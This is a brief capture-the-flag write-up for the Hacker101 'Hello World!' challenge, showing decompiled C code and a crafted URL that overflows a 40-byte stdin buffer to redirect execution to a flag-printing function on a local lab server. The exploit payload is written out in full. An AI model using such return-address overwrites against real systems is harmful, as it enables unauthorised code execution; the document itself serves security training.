hacker101-ctf

Hacker101 CTF Writeup

View on GitHub

Hello World! - FLAG0

0x00 Index

The home page is looks like the following.

And it will print out hello xyz when you send whatever via a get request.

http://127.0.0.1/xxxxxxxxxx/?stdin=world

http://127.0.0.1/xxxxxxxxxx/?stdin=0123456789012345678901234567890123456789

When make the std in 40 bytes long, some wried paddings are showing up.

http://127.0.0.1/xxxxxxxxxx/?stdin=01234567890123456789012345678901234567890

When add one more byte, the program crushed and showed core dump.

0x01 Decompile

It also has a binary file availavle to download and analysis.

The binary file starts with something ELF. So may need to decompile it to take a look.

snowman is a pretty good decomplier for C/C++. Here I got the source vulnerable.c here.

There is an important function just before pringing out the FLAGS.

void print_flags() {
    int64_t rax1;
    int64_t rsi2;
    int64_t rdx3;
    void* rbp4;
    uint32_t eax5;
    unsigned char v6;
    int64_t rbp7;

    rax1 = fun_400550("FLAGS");
    fun_400560(rax1, rsi2, rdx3);
    fun_4005a0(0);
    rbp4 = reinterpret_cast<void*>(reinterpret_cast<int64_t>(__zero_stack_offset()) - 8 - 8 + 8 - 8 + 8 - 8 + 8 - 8);
    fun_400580(reinterpret_cast<int64_t>(rbp4) - 32, 0, 32);
    read_all_stdin(reinterpret_cast<int64_t>(rbp4) - 32, 0, 32);
    eax5 = v6;
    if (*reinterpret_cast<signed char*>(&eax5)) {
        fun_400570("Hello %s!\n", reinterpret_cast<int64_t>(rbp4) - 32, 32);
    } else {
        fun_400560("What is your name?", 0, 32);
    }
    goto rbp7;
}

So we need add up the padding to it goto print the FLAGS at 0406ee

http://127.0.0.1/xxxxxxxxxx/?stdin=0123456789012345678901234567890123456789%ee%06%40%00%00%00%00%00

And here we get the flag.